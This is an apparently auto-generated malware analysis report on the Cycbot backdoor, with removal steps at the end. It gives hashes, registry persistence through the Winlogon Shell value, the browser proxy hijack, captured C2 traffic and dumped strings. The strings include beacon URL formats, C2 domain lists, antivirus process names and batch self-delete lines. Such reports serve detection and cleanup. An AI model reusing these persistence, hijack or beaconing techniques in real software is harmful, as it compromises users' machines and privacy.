Backdoor.Win32.Cycbot_ed00f71d0c

by malwarelabrobot on February 27th, 2016 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Kazy.56199 (B) (Emsisoft), Backdoor.Win32.Cycbot.FD, Trojan.Win32.Swrort.3.FD, BackdoorCycbot.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: ed00f71d0cd5a4883def3548dcbb7a03
SHA1: c5882256bd8bd149ce988692627650f3416e21eb
SHA256: daf7c86e807b8360d48eaa3d28722056ff6e490bac99fcc05096edcd2f81d01a
SSDeep: 3072:0y/hOMsOKPJzkZnj7FsbfPFmrku6NZpABEhLJxY3f/yrzUzvm:Z3sJYZj7i4sNZDfY3W
Size: 167936 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2005-09-28 09:42:22
Analyzed on: WindowsXP SP3 32-bit


Summary:

Backdoor. Malware that enables a remote control of victim's machine.

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

%original file name%.exe:1976
%original file name%.exe:1836

The Backdoor injects its code into the following process(es):

%original file name%.exe:1832

Mutexes

The following mutexes were created/opened:

WininetStartupMutex
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
c:!documents and settings!adm!local settings!history!history.ie5!
WininetConnectionMutex
ShimCacheMutex
WininetProxyRegistryMutex
_!MSFTHISTORY!_
c:!documents and settings!adm!cookies!
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
{45BCA615-C82A-4152-8857-BCC626AE4C8D}
RasPbFile
oleacc-msaa-loaded

File activity

The process %original file name%.exe:1832 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C16ROT23\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\XYK6ZH9A\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\507CF\8A8B3.exe (82577 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (5088 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (3692 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLEV456V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49MV0TMF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\507CF\F2C6.07C (3964 bytes)
%Program Files%\LP\B375\1.exe (263 bytes)
%Program Files%\LP\B375\2.exe (264 bytes)

The Backdoor deletes the following file(s):

%Program Files%\LP\B375\1.exe (0 bytes)
%Program Files%\LP\B375\2.exe (0 bytes)

The process %original file name%.exe:1976 makes changes in the file system.
The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\mmc00963738.xml (0 bytes)

The process %original file name%.exe:1836 makes changes in the file system.
The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\mmc05412372.xml (0 bytes)

Registry activity

The process %original file name%.exe:1832 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 03 00 00 00 14 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:51414"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF 9B 97 B0 EC 5F F9 1A 02 1A E1 17 09 C4 E0 92"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 14 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Backdoor adds the reference to itself to be executed when a user logs on:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,%Documents and Settings%\%current user%\Application Data\507CF\8A8B3.exe"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyOverride"

The process %original file name%.exe:1976 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "74 F0 5D 77 E5 6E AC 02 DB D4 E0 F4 B8 F8 4D 00"

[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"

The process %original file name%.exe:1836 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 1E 9B 2D 41 4F E5 04 F6 FF CE A7 95 C5 2B D7"

[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 77371 77824 5.34631 aa8831868613089a804c043f6864c023
.rdata 81920 414432 1024 2.99052 9164ed99dcd0e8d85f5dfafb238927de
.data 499712 87446 87552 5.51248 1fde4281d3ed98ef87714d984aeb75ee
.rsrc 589824 4096 512 0.601867 2fb126fd899b8197d0e6ef400d7655d4

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://patentgenius.com/133.gif?sv=713&tq=gwY92w4AxZnixyS3uCIi/akomBerHYk0f+svyyI3F37UO9LCp9X0MlrZ91SeDpr0aY/TqcS/6z4Khlqa+nZspACZqqDYo7tFkFahn6BZ4UHLTzZGXI3R/zTwToaifXSulMlfPU8OnhQfKv9OaoZs0FDki3/DRFB4F2HXLxskwj6PwhB7xPlDxA8/9eZDlNipsLpREa5l5iuisRKUDEGhfqmIOmQrC2eLCTyUgYK 76.76.19.57
hxxp://jyjs.randomasystems.com/logo.png?sv=599&tq=gKZEtzoYwLzEvUb5dQzRsrCpB/AuTca3l74EgC1OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU= 204.11.56.48


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /logo.png?sv=599&tq=gKZEtzoYwLzEvUb5dQzRsrCpB/AuTca3l74EgC1OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU= HTTP/1.0
Connection: close
Host: jyjs.randomasystems.com
Accept: */*
User-Agent: chrome/9.0


HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 22:22:32 GMT
Server: Apache
Set-Cookie: vsid=903vr2039845529804716; expires=Tue, 23-Feb-2021 22:22:32 GMT; path=/; domain=jyjs.randomasystems.com; httponly
Vary: A



GET /133.gif?sv=713&tq=gwY92w4AxZnixyS3uCIi/akomBerHYk0f+svyyI3F37UO9LCp9X0MlrZ91SeDpr0aY/TqcS/6z4Khlqa+nZspACZqqDYo7tFkFahn6BZ4UHLTzZGXI3R/zTwToaifXSulMlfPU8OnhQfKv9OaoZs0FDki3/DRFB4F2HXLxskwj6PwhB7xPlDxA8/9eZDlNipsLpREa5l5iuisRKUDEGhfqmIOmQrC2eLCTyUgYK HTTP/1.0
Connection: close
Host: patentgenius.com
Accept: */*
User-Agent: chrome/9.0


HTTP/1.1 302 Found
Date: Thu, 25 Feb 2016 22:22:15 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: hXXp://VVV.cnn.com?sv=713&tq=gwY92w4AxZnixyS3uCIi%2FakomBerHYk0f%2BsvyyI3F37UO9LCp9X0MlrZ91SeDpr0aY%2FTqcS%2F6z4Khlqa%2BnZspACZqqDYo7tFkFahn6BZ4UHLTzZGXI3R%2FzTwToaifXSulMlfPU8OnhQfKv9OaoZs0FDki3%2FDRFB4F2HXLxskwj6PwhB7xPlDxA8%2F9eZDlNipsLpREa5l5iuisRKUDEGhfqmIOmQrC2eLCTyUgYK
Content-Length: 613
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a 
href="hXXp://VVV.cnn.com?sv=713&tq=gwY92w4AxZnixyS3uCIi%2FakomBe
rHYk0f%2BsvyyI3F37UO9LCp9X0MlrZ91SeDpr0aY%2FTqcS%2F6z4Khlqa%2B
nZspACZqqDYo7tFkFahn6BZ4UHLTzZGXI3R%2FzTwToaifXSulMlfPU8OnhQfKv9OaoZ
s0FDki3%2FDRFB4F2HXLxskwj6PwhB7xPlDxA8%2F9eZDlNipsLpREa5l5iuisRKUD
EGhfqmIOmQrC2eLCTyUgYK">here</a>.</p>.<hr>.<ad
dress>Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_b
wlimited/1.4 Server at patentgenius.com Port 80</address>.</b
ody></html>...







The Backdoor connects to the servers at the folowing location(s):







%original file name%.exe_1832:




`.rsrc
SSj%S
<%u,V
<3%u1f
cmd.exe
GetProcessWindowStation
operator
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
>`Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
inflate 1.2.5 Copyright 1995-2010 Mark Adler
%d lines of %s read.
%d Function Prototypes found.
Including %d Library Functions.
.bss align=16
copy /b data.tmp   bss.tmp   code.tmp %s
copy /b code.tmp   data.tmp   bss.tmp %s
del *.tmp
copy /b data.tmp   code.tmp %s
al,%s
eax,%s
%s is not valid in:
Warning - Return from non-void function %s with no value
elend
.text
Warning -- "break" not supported in:
Error: %s not defined!
.data align=16
B1-1231 Warning - %s re-defined!
B1-1282 Warning - %s re-defined!
times %d db 0
times %d dd 0
XML-20003: missing token %s at line %d, column %d
XML-20004: missing keyword %s at line %d, column %d
Action: Check/update the input data to the correct keyword.
XML-20006: unexpected text at line %d column %d; expected EOF
XML-20007: missing content model in element declaration at line %s, column %s
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
\Windows NT
%s\%s
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
explorer.exe,%s
{A1D429DE-B782-4253-84AD-6E09A8438AD5}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
lvvm.exe
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
Advapi32.dll
%s%s_1
%s_0_%d_%s
%s_%d
%s_%d_%d_%d_%d
%s_%s
hXXp://xprstats.com/k1.php
type=%s&system=na&id=%s&status=%s
t=st&q=%s
%s?tq=%s
TMFLDMN%d
id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=119
%s_%s_%d
_1_%d
_2_%d
_3_%d
_4_%d
randomasystems.com
datastoreplus.com
onlineblogplus.com
yourfreshstorage.com
wwwfilesarchives.com
massstoragesys.com
onlinepdahelpforyou.com
remarkreddomas.com
transfersakkonline.com
backupdomaintolevel.com
SELECT_RESERV_SRV_%d
hXXp://%s.%s
%s.%s
stor.cfg
exec%s
%s_%d_%s
id=%s&c=%d
%s_%d_%d_%d
%s_%d_%d
%s %s
%s start%s%c%s
c1.exe
c2.exe
c3.exe
DWN_CON_STRP_%d_%s
hXXp://
hXXp://%d.ctrl.%s
logo.png
img/135.png
img/136.png
t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d
t=%s&q=&s=%d&hrs=%d
%s/%s?sv=%d&tq=%s
%s:%d/%s?sv=%d&tq=%s
hXXp://binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg
hXXp://binghamtonschools.org/images/297893.jpg
hXXp://binghamtonschools.org/images/297894.jpg
hXXp://alleducationalsoftware.com/creditcardlogos.gif
hXXp://alleducationalsoftware.com/creditcard.png
hXXp://alleducationalsoftware.com/creditcard2.png
hXXp://patentgenius.com/temp/head.png
hXXp://patentgenius.com/132.gif
hXXp://patentgenius.com/133.gif
hXXp://freedownload3.com/screenshot/4/s/89_3276.gif
hXXp://freedownload3.com/screenshot/4/s/89_3277.gif
hXXp://freedownload3.com/screenshot/4/s/89_3278.gif
hXXp://istockanalyst.com/png/intel.gif
hXXp://istockanalyst.com/png/intel.jpg
hXXp://istockanalyst.com/12.jpg
hXXp://complaintsboard.com/complaints/logo.png
hXXp://complaintsboard.com/complaints/zip.png
hXXp://complaintsboard.com/complaints/rar.png
hXXp://highspeedinternetlosangeles.webnode.com/news/1.cgi
hXXp://highspeedinternetlosangeles.webnode.com/news/1.php
hXXp://highspeedinternetlosangeles.webnode.com/news/2.php
hXXp://newworldorderreport.com/favicon.ico
hXXp://newworldorderreport.com/img/3421.png
hXXp://newworldorderreport.com/img/3422.png
hXXp://jointhenewworldorder.com/images/pages.jpg
hXXp://jointhenewworldorder.com/images/pages.png
hXXp://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame6.png
hXXp://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png
hXXp://cdn.adventofdeception.com/logo.png
t=t&hrs=%d&q=id=1000&ver=%s&s=%d
t=ip&hrs=%d&q=&s=1
%s?sv=%d&tq=%s
\bl%d_64.bat
del "%s"
if exist "%s" goto a
cmd.exe /c "%s"
GET %s HTTP/1.1
Host: %s
User-Agent: chrome/9.0
{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d
{C66E79CE-8935-4ed9-A6B1-4983619CB925}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
ahst.lni
milktoyoustudios.com
hXXp://%s/s.php?c=121&id=%s
bigbulkhypnocrys.com
hXXp://xprstats.com/images/logo.png
drweb
id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d
t=ml&q=%s
xprstats.com
hXXp://%s%s
%s_1_%d_%s
%s_2_%d_%s
%s_3_%d_%s
%s_4_%d_%s
pmv=2&id=%s&hwid=%s
u.exe
%s up%s
&%s=%s
avgnt.exe
AVGIDSAgent.exe
avgwdsvc.exe
ccsvchst.exe
AvastUI.exe
mcagent.exe
PRM_LSTN_THIS_PORT
Opera
127.0.0.1
HTTP/1.x
google.com
hXXp://VVV.google.com
HTTP/1.1 302 Found
Location: %s
id=%s&type=%d&ppcid=%s
%s: %s
%s_5_%s
http=127.0.0.1:
prefs.js
Mozilla
"network.proxy.http"
"network.proxy.http_port"
"network.proxy.type"
"127.0.0.1"
%s(%s, %s);
operaprefs.ini
Use HTTP
HTTP server
127.0.0.1:%s
%s=%s
%s:%s
hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s
id=%s&hwid=%s
exec|%s
http=
HTTP/1.0 200 OK
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
bing.com
yahoo.com
search.aol.
suche.aol.
searcht2.aol.
.yimg.com
.bing.net
scorecardresearch.com
brightcove.com
.aol.
.atwola.
.ivwbox.
.google
.atdmt.
.abmr.
.tacoda.
.adtechus.
.autodatadirect.
.mapquestapi.
.ggpht.
.virtualearth.
.opera.
.microsoft.
.wsod.
.doubleclick.
.ypcdn.
.truveo.
.tlowdb.
mapq.st
.dartsearch.
.thawte.
http://
bing.com/search
bing.com:80/search
search.yahoo.com/search
%s_1_%s
err%d%s_%d_%d
err0%s_%d_%d
ver=119&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d
%s:443/%s
%s_2_%s
%s_%s_%s
%s_3_%s
VVV.VVV.ru
hXXps://
.doubleclick.net
doubleclick.net
msn.com
%s_0%d_%d
=='undefined'?'%s':'%s'
.referrer
HTTP/1.0
%s %s %s
hXXp://VVV.google.com/
hXXp://VVV.yahoo.com/
.class
.midi
google_ad.url
google_ad.title
r.msn.com
google_ad.line1
zcÁ
c:\%original file name%.exe
%Program Files%\CF2C6
%Documents and Settings%\%current user%\Application Data\507CF
%Program Files%\LP\B375
GetCPInfo
RegFlushKey
RegOpenKeyExA
RegCloseKey
WinHttpReadData
WinHttpOpenRequest
WinHttpOpen
WinHttpQueryDataAvailable
WinHttpReceiveResponse
WinHttpSendRequest
WinHttpConnect
WinHttpCloseHandle
`.rdata
@.data
.rsrc
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
RASAPI32.dll
RPCRT4.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
WINHTTP.dll
WININET.dll
WS2_32.dll
>J%Fj
mscoree.dll
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
Dr.Web
mhttp=127.0.0.1:%d
hXXp://VVV.yahoo.com
2.0.2.1

%original file name%.exe_1832_rwx_00150000_00001000:




Tcpip

%original file name%.exe_1832_rwx_00163000_00001000:




%SystemRoot%\system32\mswsock.dll
%Documents and Settings%\All Users\Application Data
MSAFD Tcpip [TCP/IP]

%original file name%.exe_1832_rwx_00400000_0008E000:




`.rsrc
SSj%S
<%u,V
<3%u1f
cmd.exe
GetProcessWindowStation
operator
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
>`Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
inflate 1.2.5 Copyright 1995-2010 Mark Adler
%d lines of %s read.
%d Function Prototypes found.
Including %d Library Functions.
.bss align=16
copy /b data.tmp   bss.tmp   code.tmp %s
copy /b code.tmp   data.tmp   bss.tmp %s
del *.tmp
copy /b data.tmp   code.tmp %s
al,%s
eax,%s
%s is not valid in:
Warning - Return from non-void function %s with no value
elend
.text
Warning -- "break" not supported in:
Error: %s not defined!
.data align=16
B1-1231 Warning - %s re-defined!
B1-1282 Warning - %s re-defined!
times %d db 0
times %d dd 0
XML-20003: missing token %s at line %d, column %d
XML-20004: missing keyword %s at line %d, column %d
Action: Check/update the input data to the correct keyword.
XML-20006: unexpected text at line %d column %d; expected EOF
XML-20007: missing content model in element declaration at line %s, column %s
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
\Windows NT
%s\%s
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
explorer.exe,%s
{A1D429DE-B782-4253-84AD-6E09A8438AD5}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
lvvm.exe
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
Advapi32.dll
%s%s_1
%s_0_%d_%s
%s_%d
%s_%d_%d_%d_%d
%s_%s
hXXp://xprstats.com/k1.php
type=%s&system=na&id=%s&status=%s
t=st&q=%s
%s?tq=%s
TMFLDMN%d
id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=119
%s_%s_%d
_1_%d
_2_%d
_3_%d
_4_%d
randomasystems.com
datastoreplus.com
onlineblogplus.com
yourfreshstorage.com
wwwfilesarchives.com
massstoragesys.com
onlinepdahelpforyou.com
remarkreddomas.com
transfersakkonline.com
backupdomaintolevel.com
SELECT_RESERV_SRV_%d
hXXp://%s.%s
%s.%s
stor.cfg
exec%s
%s_%d_%s
id=%s&c=%d
%s_%d_%d_%d
%s_%d_%d
%s %s
%s start%s%c%s
c1.exe
c2.exe
c3.exe
DWN_CON_STRP_%d_%s
hXXp://
hXXp://%d.ctrl.%s
logo.png
img/135.png
img/136.png
t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d
t=%s&q=&s=%d&hrs=%d
%s/%s?sv=%d&tq=%s
%s:%d/%s?sv=%d&tq=%s
hXXp://binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg
hXXp://binghamtonschools.org/images/297893.jpg
hXXp://binghamtonschools.org/images/297894.jpg
hXXp://alleducationalsoftware.com/creditcardlogos.gif
hXXp://alleducationalsoftware.com/creditcard.png
hXXp://alleducationalsoftware.com/creditcard2.png
hXXp://patentgenius.com/temp/head.png
hXXp://patentgenius.com/132.gif
hXXp://patentgenius.com/133.gif
hXXp://freedownload3.com/screenshot/4/s/89_3276.gif
hXXp://freedownload3.com/screenshot/4/s/89_3277.gif
hXXp://freedownload3.com/screenshot/4/s/89_3278.gif
hXXp://istockanalyst.com/png/intel.gif
hXXp://istockanalyst.com/png/intel.jpg
hXXp://istockanalyst.com/12.jpg
hXXp://complaintsboard.com/complaints/logo.png
hXXp://complaintsboard.com/complaints/zip.png
hXXp://complaintsboard.com/complaints/rar.png
hXXp://highspeedinternetlosangeles.webnode.com/news/1.cgi
hXXp://highspeedinternetlosangeles.webnode.com/news/1.php
hXXp://highspeedinternetlosangeles.webnode.com/news/2.php
hXXp://newworldorderreport.com/favicon.ico
hXXp://newworldorderreport.com/img/3421.png
hXXp://newworldorderreport.com/img/3422.png
hXXp://jointhenewworldorder.com/images/pages.jpg
hXXp://jointhenewworldorder.com/images/pages.png
hXXp://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame6.png
hXXp://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png
hXXp://cdn.adventofdeception.com/logo.png
t=t&hrs=%d&q=id=1000&ver=%s&s=%d
t=ip&hrs=%d&q=&s=1
%s?sv=%d&tq=%s
\bl%d_64.bat
del "%s"
if exist "%s" goto a
cmd.exe /c "%s"
GET %s HTTP/1.1
Host: %s
User-Agent: chrome/9.0
{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d
{C66E79CE-8935-4ed9-A6B1-4983619CB925}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
ahst.lni
milktoyoustudios.com
hXXp://%s/s.php?c=121&id=%s
bigbulkhypnocrys.com
hXXp://xprstats.com/images/logo.png
drweb
id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d
t=ml&q=%s
xprstats.com
hXXp://%s%s
%s_1_%d_%s
%s_2_%d_%s
%s_3_%d_%s
%s_4_%d_%s
pmv=2&id=%s&hwid=%s
u.exe
%s up%s
&%s=%s
avgnt.exe
AVGIDSAgent.exe
avgwdsvc.exe
ccsvchst.exe
AvastUI.exe
mcagent.exe
PRM_LSTN_THIS_PORT
Opera
127.0.0.1
HTTP/1.x
google.com
hXXp://VVV.google.com
HTTP/1.1 302 Found
Location: %s
id=%s&type=%d&ppcid=%s
%s: %s
%s_5_%s
http=127.0.0.1:
prefs.js
Mozilla
"network.proxy.http"
"network.proxy.http_port"
"network.proxy.type"
"127.0.0.1"
%s(%s, %s);
operaprefs.ini
Use HTTP
HTTP server
127.0.0.1:%s
%s=%s
%s:%s
hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s
id=%s&hwid=%s
exec|%s
http=
HTTP/1.0 200 OK
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
bing.com
yahoo.com
search.aol.
suche.aol.
searcht2.aol.
.yimg.com
.bing.net
scorecardresearch.com
brightcove.com
.aol.
.atwola.
.ivwbox.
.google
.atdmt.
.abmr.
.tacoda.
.adtechus.
.autodatadirect.
.mapquestapi.
.ggpht.
.virtualearth.
.opera.
.microsoft.
.wsod.
.doubleclick.
.ypcdn.
.truveo.
.tlowdb.
mapq.st
.dartsearch.
.thawte.
http://
bing.com/search
bing.com:80/search
search.yahoo.com/search
%s_1_%s
err%d%s_%d_%d
err0%s_%d_%d
ver=119&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d
%s:443/%s
%s_2_%s
%s_%s_%s
%s_3_%s
VVV.VVV.ru
hXXps://
.doubleclick.net
doubleclick.net
msn.com
%s_0%d_%d
=='undefined'?'%s':'%s'
.referrer
HTTP/1.0
%s %s %s
hXXp://VVV.google.com/
hXXp://VVV.yahoo.com/
.class
.midi
google_ad.url
google_ad.title
r.msn.com
google_ad.line1
zcÁ
c:\%original file name%.exe
%Program Files%\CF2C6
%Documents and Settings%\%current user%\Application Data\507CF
%Program Files%\LP\B375
GetCPInfo
RegFlushKey
RegOpenKeyExA
RegCloseKey
WinHttpReadData
WinHttpOpenRequest
WinHttpOpen
WinHttpQueryDataAvailable
WinHttpReceiveResponse
WinHttpSendRequest
WinHttpConnect
WinHttpCloseHandle
`.rdata
@.data
.rsrc
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
RASAPI32.dll
RPCRT4.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
WINHTTP.dll
WININET.dll
WS2_32.dll
mscoree.dll
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
Dr.Web
mhttp=127.0.0.1:%d
hXXp://VVV.yahoo.com
2.0.2.1






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    %original file name%.exe:1976
    %original file name%.exe:1836
    

    2. 

  2. Delete the original Backdoor file.
    3. 

  3. Delete or disinfect the following files created/modified by the Backdoor:
    

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C16ROT23\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\XYK6ZH9A\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Application Data\507CF\8A8B3.exe (82577 bytes)
    %Documents and Settings%\%current user%\NTUSER.DAT.LOG (5088 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLEV456V\desktop.ini (67 bytes)
